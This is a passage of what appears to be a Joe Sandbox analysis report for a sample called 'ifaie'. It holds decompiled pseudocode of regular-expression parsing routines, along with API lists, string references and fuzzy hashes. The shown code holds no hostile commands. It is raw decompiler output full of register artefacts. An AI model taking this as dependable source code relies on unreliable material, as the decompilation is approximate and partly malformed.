												E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x58,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
											}
											_t272 =  *((intOrPtr*)(_t338 + 0x10));
											_push(_t338 - 0x18);
											 *(_t338 - 0x18) = 2;
											 *(_t338 - 0x14) = _t320;
											_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
											_t190 = _t338 - 0x2c;
											L29:
											_push(_t190);
											E00407990(_t272);
											L30:
											 *(_t338 - 0x18) = 0;
											 *0x41720c();
											 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
											goto L1;
										}
									}
								}
								goto L54;
							}
						} else {
							if(_t345 == 0) {
								 *0x41720c();
								_t324 =  *(_t338 + 8) -  *(_t334 + 4);
								__eflags =  *(_t338 - 0x10);
								 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
								if( *(_t338 - 0x10) != 0) {
									E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
								}
								 *(_t338 - 0x18) = 1;
								 *(_t338 - 0x14) = 0;
								goto L21;
							} else {
								_t325 = _t320 - 0x22;
								if(_t325 == 0) {
									 *0x41720c();
									asm("sbb ecx, ecx");
									_t216 = E004090FF(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x24)) + 0xf)) - 1);
									_t341 = _t341 + 0xc;
									__eflags = _t216;
									 *(_t338 - 0x1c) = _t216;
									if(_t216 == 0) {
										 *((char*)(_t338 - 0x40)) =  *((intOrPtr*)(_t338 + 0x13));
										 *0x417230(0);
										_t337 = "invalid backreference in substitution";
										 *0x417234(_t337, strlen(_t337));
										 *(_t338 - 4) = 0;
										E00404FA7(_t338 - 0x78, _t338 - 0x40);
										_push(0x4196f8);
										_push(_t338 - 0x78);
										 *((intOrPtr*)(_t338 - 0x78)) = 0x417698;
										L004153FE();
										L50:
										 *((char*)(_t338 - 0x54)) =  *((intOrPtr*)(_t338 + 0x13));
										 *0x417230(0);
										_t336 = "expecting escape sequence in substitution string";
										 *0x417234(_t336, strlen(_t336));
										 *(_t338 - 4) = 1;
										E00404FA7(_t338 - 0x94, _t338 - 0x54);
										_t158 = _t338 - 0x94;
										_push(0x4196f8);
										_push(_t158);
										 *(_t338 - 0x94) = 0x417698;
										L004153FE();
									} else {
										 *0x41720c();
										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
										__eflags =  *(_t338 - 0x10);
										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
										if( *(_t338 - 0x10) != 0) {
											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
										}
										 *(_t338 - 0x18) = 1;
										 *(_t338 - 0x14) =  *(_t338 - 0x1c);
										goto L21;
									}
								} else {
									_t329 = _t325 - 1;
									if(_t329 == 0) {
										 *0x41720c();
										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
										__eflags =  *(_t338 - 0x10);
										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
										if( *(_t338 - 0x10) != 0) {
											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
										}
										 *(_t338 - 0x14) =  *(_t338 - 0x14) | 0xffffffff;
										 *(_t338 - 0x18) = 1;
										goto L21;
									} else {
										if(_t329 != 1) {
											L31:
											 *(_t338 - 0x10) =  *(_t338 - 0x10) + 1;
											 *(_t338 + 8) =  *(_t338 + 8) + 1;
											continue;
										} else {
											 *0x41720c();
											_t324 =  *(_t338 + 8) -  *(_t334 + 4);
											 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
											if( *(_t338 - 0x10) != 0) {
												E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
											}
											 *(_t338 - 0x18) = 1;
											 *(_t338 - 0x14) = 0xfffffffe;
											L21:
											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
											 *(_t338 - 0x18) = 0;
											 *(_t338 - 0x14) = _t324;
											while(1) {
												L1:
												 *(_t338 - 0x10) = 0;
												goto L2;
											}
										}
									}
									L54:
								}
							}
						}
						break;
					}
					__eflags =  *(_t338 - 0x10);
					if( *(_t338 - 0x10) != 0) {
						_t158 = E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t338 - 0xc));
					return _t158;
					goto L54;
				}
			}

APIs

_EH_prolog.MSVCRT ref: 004061C3
strlen.MSVCRT ref: 0040653A
_CxxThrowException.MSVCRT(?,004196F8), ref: 0040656A
strlen.MSVCRT ref: 00406585
_CxxThrowException.MSVCRT(?,004196F8), ref: 004065C2

Strings

invalid backreference in substitution, xrefs: 00406534, 00406539, 00406541
expecting escape sequence in substitution string, xrefs: 0040657F, 00406584, 0040658C

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionThrowstrlen$H_prolog
String ID: expecting escape sequence in substitution string$invalid backreference in substitution
API String ID: 875129476-967196223
Opcode ID: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
Instruction ID: 3761f46dd23904d97e1b94dca212cf1cba20719bb6d9752a604dd134c7b2255e
Opcode Fuzzy Hash: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
Instruction Fuzzy Hash: 5CE14271A0060ADFCF14DFA8C8949EEBBB5FF44300F11852EE917A7281D778AA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004050B8 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 339
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E004050B8(intOrPtr __ecx) {
				signed int _t484;
				char _t487;
				intOrPtr _t490;
				void* _t516;
				signed int* _t518;
				signed int _t534;
				signed int _t535;
				void* _t560;
				signed int* _t561;
				void* _t563;
				char* _t567;
				void* _t568;

				L004153D0();
				_t564 = __ecx;
				 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0;
				 *((intOrPtr*)(_t568 - 0x10)) = __ecx;
				 *(_t568 - 0x20) = 0;
				 *(_t568 - 0x30) =  *(_t568 - 0x30) & 0;
				 *(_t568 - 4) = 0;
				 *((intOrPtr*)(_t568 - 0x2c)) = 0;
				_t561 =  *(_t568 + 0x10);
				 *(_t568 - 0x34) =  *(_t568 - 0x34) & 0;
				_t517 =  *(__ecx + 0x27);
				 *(_t568 - 4) = 1;
				 *((char*)(_t568 + 0x13)) = ( *_t561 & 0x00000100) == 0x100;
				 *0x41720c(_t560, _t563, _t516);
				_t518 =  *(_t568 + 8);
				asm("sbb ecx, ecx");
				if(( ~(( *(__ecx + 0x27))[1]) & _t517[2] + ( *(__ecx + 0x27))[1]) !=  *_t518) {
					 *(_t568 + 8) =  *(__ecx + 0x27);
					 *0x41720c();
					asm("sbb edx, edx");
					_t484 = E00406B23(_t561, _t518,  ~(( *(_t568 + 8))[1]) & ( *(_t568 + 8))[2] + ( *(_t568 + 8))[1]);
					__eflags = _t484 - 0x21;
					if(__eflags > 0) {
						L18:
						__eflags =  *(_t568 - 0x20);
						if( *(_t568 - 0x20) != 0) {
							_push(_t561);
							_push( *(_t568 - 0x34));
							_push(_t518);
							_push(_t568 - 0x24);
							E00408D03(_t564);
							_t490 =  *((intOrPtr*)(_t568 + 0xc));
							_t534 =  *(_t568 - 0x20);
							 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0x00000000;
							 *( *(_t490 + 0x1c)) = _t534;
							_t535 = _t534 + 4;
							__eflags = _t535;
							 *(_t490 + 0x1c) = _t535;
						}
						L20:
						 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
						E0040C5ED(_t568 - 0x30);
						_t101 = _t568 - 4;
						 *_t101 =  *(_t568 - 4) | 0xffffffff;
						__eflags =  *_t101;
						E00406ED3(_t568 - 0x24);
						_t487 = 1;
						goto L21;
					}
					switch( *((intOrPtr*)(_t484 * 4 +  &M00405D48))) {
						case 0:
							 *(_t568 + 0x10) =  *(__ecx + 0x27);
							 *0x41720c();
							_t492 =  *(_t568 + 0x10);
							_t537 = _t492[1];
							asm("sbb edx, edx");
							__eflags = ( ~_t537 & _t492[2] + _t537) -  *_t518;
							if(( ~_t537 & _t492[2] + _t537) !=  *_t518) {
								_push(_t561);
								_push( *((intOrPtr*)(_t568 + 0xc)));
								_push(_t518);
								E00405EEA(__ecx);
								goto L15;
							}
							_t498 =  *((intOrPtr*)(_t568 + 0xc));
							__eflags =  *(_t498 + 0x10);
							if( *(_t498 + 0x10) == 0) {
								goto L10;
							}
							_push(0);
							 *((char*)(_t568 - 0x64)) =  *((intOrPtr*)(_t568 + 0xf));
							 *0x417230();
							_t566 = "mismatched parenthesis";
							_push(strlen(_t566));
							_push(_t566);
							 *0x417234();
							 *(_t568 - 4) = 3;
							E00404FA7(_t568 - 0x9c, _t568 - 0x64);
							 *((intOrPtr*)(_t568 - 0x9c)) = 0x417698;
							_push(0x4196f8);
							_t505 = _t568 - 0x9c;
							goto L9;
						case 1:
							__ecx = __esi;
							__eax = E00404705(__ecx, __ebx,  *(__ebp + 0xc), __edi,  *(__ebp + 0x14));
							__eflags = __eax;
							_t82 = __eax != 0;
							__eflags = _t82;
							__ecx = __ecx & 0xffffff00 | _t82;
							 *(__ebp - 0x10) = __eax;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							__eax = E00406ED3(__ecx);
							 *((char*)(__ebp - 0x34)) = 1;
							goto L18;
						case 2:
							__eax =  *(__ebp + 0xc);
							__eflags =  *(__eax + 0x10);
							if( *(__eax + 0x10) != 0) {
								L10:
								_t520 = 0;
								goto L16;
							}
							__al =  *((intOrPtr*)(__ebp + 0xf));
							_push(0);
							__ecx = __ebp - 0x44;
							 *(__ebp - 0x44) =  *((intOrPtr*)(__ebp + 0xf));
							__eax =  *0x417230();
							__esi = "mismatched parenthesis";
							__eax = strlen(__esi);
							_pop(__ecx);
							_push(__eax);
							_push(__esi);
							__ecx = __ebp - 0x44;
							 *0x417234() = __ebp - 0x44;
							__ecx = __ebp - 0xd4;
							 *((char*)(__ebp - 4)) = 4;
							__eax = E00404FA7(__ecx, __ebp - 0x44);
							 *(__ebp - 0xd4) = 0x417698;
							_push(0x4196f8);
							__eax = __ebp - 0xd4;
							L9:
							_push(_t505);
							L004153FE();
							goto L10;
						case 3:
							__esi =  *(__ebp + 0xc);
							__ecx = __esi;
							 *__esi =  *((intOrPtr*)( *__esi + 0x38))();
							__ecx = __esi[0x1c];
							 *(__esi[0x1c]) =  *__esi;
							__ecx = __esi;
							__eax = E00406F41(__ecx);
							L15:
							_t520 = 1;
							L16:
							 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
							E0040C5ED(_t568 - 0x30);
							 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
							E00406ED3(_t568 - 0x24);
							_t487 = _t520;
							goto L21;
						case 4:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E00409233( *__edi,  &(__esi[4]));
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 5:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E0040927C( *__edi,  &(__esi[4]));
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 6:
							__ecx = __esi[4];
							__eax = E0040507F(__ecx, 0x40);
							 *(__ebp + 0x10) = __eax;
							 *(__ebp + 8) = __eax;
							__eflags = __eax;
							 *((char*)(__ebp - 4)) = 5;
							if(__eax == 0) {
								__eax = 0;
								__eflags = 0;
							} else {
								__ecx =  *(__ebp + 0x10);
								__eax =  &(__esi[4]);
								_push( &(__esi[4]));
								__eax = E00405DE3(__ecx);
								__eax =  *(__ebp + 0x10);
								 *__eax = 0x4177a0;
							}
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							 *(__ebp - 0x10) = __eax;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x30;
							 *((char*)(__ebp - 4)) = 1;
							__eax = E0040BFD3(__ebp - 0x30, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							__eax = E0040C5ED(__ebp - 0x14);
							__ecx = __esi[0x27];
							 *(__ebp + 0x10) = __esi[0x27];
							__eax =  *0x41720c();
							__eax =  *(__ebp + 0x10);
							__ecx =  *(__eax + 4);
							__eax =  *(__eax + 8);
							__edx = __ecx;
							__eax = __eax + __ecx;
							__edx =  ~__ecx;
							asm("sbb edx, edx");
							__edx =  ~__ecx & __eax;
							__ebp - 0x30 = E004092C5(__ebx, __ebp - 0x30, __ebx, __edx, __edi);
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push(__ecx);
							_push( *__edi);
							_push( *((intOrPtr*)(__ebp - 0x2c)));
							__eax = E00409941(__ecx);
							__esp = __esp + 0x1c;
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							__eax = E00406ED3(__ecx);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							goto L18;
						case 7:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E004099FB( *__edi,  &(__esi[4]));
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 8:
							__ecx = __esi[0x27];
							 *(__ebp + 8) = __esi[0x27];
							__eax =  *0x41720c();
							__eax =  *(__ebp + 8);
							__ecx =  *(__eax + 4);
							__eax =  *(__eax + 8);
							__edx = __ecx;
							__eax = __eax + __ecx;
							__edx =  ~__ecx;
							asm("sbb edx, edx");
							__edx =  ~__ecx & __eax;
							__eax =  *__ebx;
							__eflags = __edx - __eax;
							if(__edx != __eax) {
								__cl =  *__eax;
								__eflags = __cl - 0x30;
								if(__cl < 0x30) {
									L57:
									__eflags = __cl - 0x65;
									if(__cl != 0x65) {
										__eflags = __cl - 0x78;
										if(__cl != 0x78) {
											__eflags = __cl - 0x63;
											if(__cl != 0x63) {
												__eflags = __cl - 0x61;
												if(__cl != 0x61) {
													L80:
													__eflags = __cl - 0x66;
													if(__cl != 0x66) {
														L83:
														__eflags = __cl - 0x6e;
														if(__cl != 0x6e) {
															L86:
															__eflags = __cl - 0x72;
															if(__cl != 0x72) {
																L89:
																__eflags = __cl - 0x74;
																if(__cl != 0x74) {
																	L92:
																	__eflags = __cl - 0x5c;
																	if(__cl != 0x5c) {
																		L96:
																		_push(__edi);
																		_push(__ecx);
																		__eax = E00409CBB();
																		_pop(__ecx);
																		__eflags = __eax;
																		_pop(__ecx);
																		if(__eax == 0) {
																			__eax =  *__edi;
																			__ecx =  &(__esi[4]);
																			__eax =  *__ebx;
																			__al =  *( *__ebx);
																			__eax = E00409BC5(__esi,  *__ebx,  *__edi,  &(__esi[4]));
																			 *(__ebp - 0x10) = __eax;
																			__eflags = __eax;
																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
																			__eax = __ebp - 0x14;
																			 *(__ebp - 0x14) = __cl;
																			__ecx = __ebp - 0x24;
																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																			__ecx = __ebp - 0x14;
																		} else {
																			__ecx =  *__edi;
																			__edx =  &(__esi[4]);
																			__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
																			 *(__ebp - 0x10) = __eax;
																			__eflags = __eax;
																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
																			__eax = __ebp - 0x14;
																			 *(__ebp - 0x14) = __cl;
																			__ecx = __ebp - 0x24;
																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																			__ecx = __ebp - 0x14;
																		}
																		L44:
																		__eax = E00406ED3(__ecx);
																		 *__ebx =  *__ebx + 1;
																		goto L18;
																	}
																	__eflags =  *(__ebp + 0x13);
																	if( *(__ebp + 0x13) == 0) {
																		goto L96;
																	}
																	__eax = __eax + 1;
																	__ecx =  &(__esi[4]);
																	 *__ebx = __eax;
																	__eax =  *__edi;
																	__eax = E00409BC5(__esi, 0x5c,  *__edi,  &(__esi[4]));
																	 *(__ebp - 0x10) = __eax;
																	__eflags = __eax;
																	_t420 = __eax != 0;
																	__eflags = _t420;
																	__ecx = __ecx & 0xffffff00 | _t420;
																	__eax = __ebp - 0x14;
																	 *(__ebp - 0x14) = __cl;
																	__ecx = __ebp - 0x24;
																	__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																	__ecx = __ebp - 0x14;
																	goto L95;
																}
																__eflags =  *(__ebp + 0x13);
																if( *(__ebp + 0x13) == 0) {
																	goto L92;
																}
																__eax = __eax + 1;
																__ecx =  &(__esi[4]);
																 *__ebx = __eax;
																__eax =  *__edi;
																__eax = E00409BC5(__esi, 9,  *__edi,  &(__esi[4]));
																 *(__ebp - 0x10) = __eax;
																__eflags = __eax;
																__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
																__eax = __ebp - 0x14;
																 *(__ebp - 0x14) = __cl;
																__ecx = __ebp - 0x24;
																__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
																__ecx = __ebp - 0x14;
																goto L95;
															}
															__eflags =  *(__ebp + 0x13);
															if( *(__ebp + 0x13) == 0) {
																goto L89;
															}
															__eax = __eax + 1;
															__ecx =  &(__esi[4]);
															 *__ebx = __eax;
															__eax =  *__edi;
															__eax = E00409BC5(__esi, 0xd,  *__edi,  &(__esi[4]));
															 *(__ebp - 0x10) = __eax;
															__eflags = __eax;
															__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
															__eax = __ebp - 0x14;
															 *(__ebp - 0x14) = __cl;
															__ecx = __ebp - 0x24;
															__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
															__ecx = __ebp - 0x14;
															goto L95;
														}
														__eflags =  *(__ebp + 0x13);
														if( *(__ebp + 0x13) == 0) {
															goto L86;
														}
														__eax = __eax + 1;
														__ecx =  &(__esi[4]);
														 *__ebx = __eax;
														__eax =  *__edi;
														__eax = E00409BC5(__esi, 0xa,  *__edi,  &(__esi[4]));
														 *(__ebp - 0x10) = __eax;
														__eflags = __eax;
														__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
														__eax = __ebp - 0x14;
														 *(__ebp - 0x14) = __cl;
														__ecx = __ebp - 0x24;
														__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
														__ecx = __ebp - 0x14;
														goto L95;
													}
													__eflags =  *(__ebp + 0x13);
													if( *(__ebp + 0x13) == 0) {
														goto L83;
													}
													__eax = __eax + 1;
													__ecx =  &(__esi[4]);
													 *__ebx = __eax;
													__eax =  *__edi;
													__eax = E00409BC5(__esi, 0xc,  *__edi,  &(__esi[4]));
													 *(__ebp - 0x10) = __eax;
													__eflags = __eax;
													__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = __cl;
													__ecx = __ebp - 0x24;
													__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
													__ecx = __ebp - 0x14;
													goto L95;
												}
												__eflags =  *(__ebp + 0x13);
												if( *(__ebp + 0x13) == 0) {
													goto L80;
												}
												__eax = __eax + 1;
												__ecx =  &(__esi[4]);
												 *__ebx = __eax;
												__eax =  *__edi;
												__eax = E00409BC5(__esi, 7,  *__edi,  &(__esi[4]));
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = __cl;
												__ecx = __ebp - 0x24;
												__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
												__ecx = __ebp - 0x14;
												goto L95;
											}
											__ecx = __esi[0x27];
											 *(__ebp + 0x10) = __esi[0x27];
											__eax =  *0x41720c();
											__eax =  *(__ebp + 0x10);
											__ecx =  *(__eax + 4);
											 *__ebx =  *__ebx + 1;
											__eax =  *(__eax + 8);
											__edx = __ecx;
											__eax = __eax + __ecx;
											__ecx =  *__ebx;
											__edx =  ~__edx;
											asm("sbb edx, edx");
											__edx = __edx & __eax;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__al =  *((intOrPtr*)(__ebp + 0xf));
												_push(0);
												__ecx = __ebp - 0x54;
												 *(__ebp - 0x54) =  *((intOrPtr*)(__ebp + 0xf));
												__eax =  *0x417230();
												__esi = "incomplete escape sequence \\c";
												__eax = strlen(__esi);
												_pop(__ecx);
												_push(__eax);
												_push(__esi);
												__ecx = __ebp - 0x54;
												 *0x417234() = __ebp - 0x54;
												__ecx = __ebp - 0xb8;
												 *((char*)(__ebp - 4)) = 6;
												E00404FA7(__ecx, __ebp - 0x54) = __ebp - 0xb8;
												_push(0x4196f8);
												_push(__ebp - 0xb8);
												 *(__ebp - 0xb8) = 0x417698;
												L004153FE();
											}
											__al =  *__ecx;
											__ecx = __ecx + 1;
											__eflags = __al - 0x61;
											 *__ebx = __ecx;
											if(__al >= 0x61) {
												__eflags = __al - 0x7a;
												if(__al <= 0x7a) {
													__eax = __al;
													_push(__al);
													__eax =  *0x4172a4();
													_pop(__ecx);
												}
											}
											__ecx =  *__edi;
											__edx =  &(__esi[4]);
											__al = __al ^ 0x00000040;
											__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
											 *(__ebp - 0x10) = __eax;
											__eflags = __eax;
											__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
											__eax = __ebp - 0x14;
											 *(__ebp - 0x14) = __cl;
											__ecx = __ebp - 0x24;
											__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
											__ecx = __ebp - 0x14;
											goto L95;
										}
										 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
										 *(__ebp + 0x13) =  *(__ebp + 0x13) & 0x00000000;
										__eax = __eax + 1;
										__eflags = __eax;
										 *__ebx = __eax;
										while(1) {
											__ecx = __esi[0x27];
											 *(__ebp + 0x14) = __esi[0x27];
											__eax =  *0x41720c();
											__eax =  *(__ebp + 0x14);
											__ecx =  *(__eax + 4);
											__eax =  *(__eax + 8);
											__edx = __ecx;
											__eax = __eax + __ecx;
											__edx =  ~__ecx;
											asm("sbb edx, edx");
											__edx =  ~__ecx & __eax;
											__eax =  *__ebx;
											__eflags = __edx - __eax;
											if(__edx == __eax) {
												break;
											}
											__al =  *__eax;
											__eflags = __al - 0x30;
											if(__al < 0x30) {
												L64:
												__eflags = __al - 0x61;
												if(__al < 0x61) {
													L66:
													__eflags = __al - 0x41;
													if(__al < 0x41) {
														break;
													}
													__eflags = __al - 0x46;
													if(__al > 0x46) {
														break;
													}
													L68:
													__eax = E00402FBD(__eax);
													__cl =  *(__ebp + 8);
													__cl =  *(__ebp + 8) << 4;
													__al = __al + __cl;
													 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
													 *__ebx =  *__ebx + 1;
													__eflags =  *(__ebp + 0x13) - 2;
													 *(__ebp + 8) = __al;
													if( *(__ebp + 0x13) < 2) {
														continue;
													}
													break;
												}
												__eflags = __al - 0x66;
												if(__al <= 0x66) {
													goto L68;
												}
												goto L66;
											}
											__eflags = __al - 0x39;
											if(__al <= 0x39) {
												goto L68;
											}
											goto L64;
										}
										__eax =  *__edi;
										__ecx =  &(__esi[4]);
										__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
										 *(__ebp - 0x10) = __eax;
										__eflags = __eax;
										__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
										__eax = __ebp - 0x14;
										 *(__ebp - 0x14) = __cl;
										__ecx = __ebp - 0x24;
										__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
										__ecx = __ebp - 0x14;
										goto L95;
									}
									__eax = __eax + 1;
									__ecx =  &(__esi[4]);
									 *__ebx = __eax;
									__eax =  *__edi;
									__eax = E00409BC5(__esi, 0x1b,  *__edi,  &(__esi[4]));
									 *(__ebp - 0x10) = __eax;
									__eflags = __eax;
									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
									__eax = __ebp - 0x14;
									 *(__ebp - 0x14) = __cl;
									__ecx = __ebp - 0x24;
									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
									__ecx = __ebp - 0x14;
									goto L95;
								}
								__eflags = __cl - 0x39;
								if(__cl > 0x39) {
									goto L57;
								}
								__ecx = __esi[0x27];
								 *(__ebp - 0x28) = __eax;
								 *(__ebp + 0x10) = __esi[0x27];
								__eax =  *0x41720c();
								__eax =  *(__ebp + 0x10);
								__ecx =  *(__eax + 4);
								__eax =  *(__eax + 8);
								__edx = __ecx;
								__eax = __eax + __ecx;
								__edx =  ~__ecx;
								asm("sbb edx, edx");
								__edx =  ~__ecx & __eax;
								__eax = __ebp - 0x28;
								__eax = E004090FF(__ebp - 0x28, __edx, 0x3e7);
								__ecx =  *__ebx;
								__eflags =  *( *__ebx) - 0x30;
								if( *( *__ebx) == 0x30) {
									L51:
									 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
									_t297 = __ebp + 0x13;
									 *_t297 =  *(__ebp + 0x13) & 0x00000000;
									__eflags =  *_t297;
									while(1) {
										__ecx = __esi[0x27];
										 *(__ebp + 0x14) = __esi[0x27];
										__eax =  *0x41720c();
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__eax + 4);
										__eax =  *(__eax + 8);
										__edx = __ecx;
										__eax = __eax + __ecx;
										__edx =  ~__ecx;
										asm("sbb edx, edx");
										__edx =  ~__ecx & __eax;
										__eax =  *__ebx;
										__eflags = __edx - __eax;
										if(__edx == __eax) {
											break;
										}
										__cl =  *__eax;
										__eflags = __cl - 0x30;
										if(__cl < 0x30) {
											break;
										}
										__eflags = __cl - 0x37;
										if(__cl > 0x37) {
											break;
										}
										 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
										__eax = __eax + 1;
										__eflags =  *(__ebp + 0x13) - 3;
										 *(__ebp + 8) = ( *(__ebp + 8) - 6 << 3) + __cl;
										 *__ebx = __eax;
										if( *(__ebp + 0x13) < 3) {
											continue;
										}
										break;
									}
									__eax =  *__edi;
									__ecx =  &(__esi[4]);
									__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
									 *(__ebp - 0x10) = __eax;
									__eflags = __eax;
									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
									__eax = __ebp - 0x14;
									 *(__ebp - 0x14) = __cl;
									__ecx = __ebp - 0x24;
									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
									__ecx = __ebp - 0x14;
									goto L95;
								}
								__eflags = __eax - 0xa;
								if(__eax < 0xa) {
									L50:
									__ecx =  *__edi;
									__edx =  &(__esi[4]);
									__eax = E00409C62(__eax,  *__edi,  &(__esi[4]));
									 *(__ebp - 0x10) = __eax;
									__eflags = __eax;
									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
									__eax = __ebp - 0x14;
									 *(__ebp - 0x14) = __cl;
									__ecx = __ebp - 0x24;
									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
									__ecx = __ebp - 0x14;
									E00406ED3(__ecx) =  *(__ebp - 0x28);
									 *__ebx =  *(__ebp - 0x28);
									goto L18;
								}
								__eflags = __eax - __esi[0xb];
								if(__eax >= __esi[0xb]) {
									goto L51;
								}
								goto L50;
							}
							__ecx =  *__edi;
							__eax = __eax - 1;
							__edx =  &(__esi[4]);
							 *__ebx = __eax;
							__al =  *__eax;
							__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							_t273 = __eax != 0;
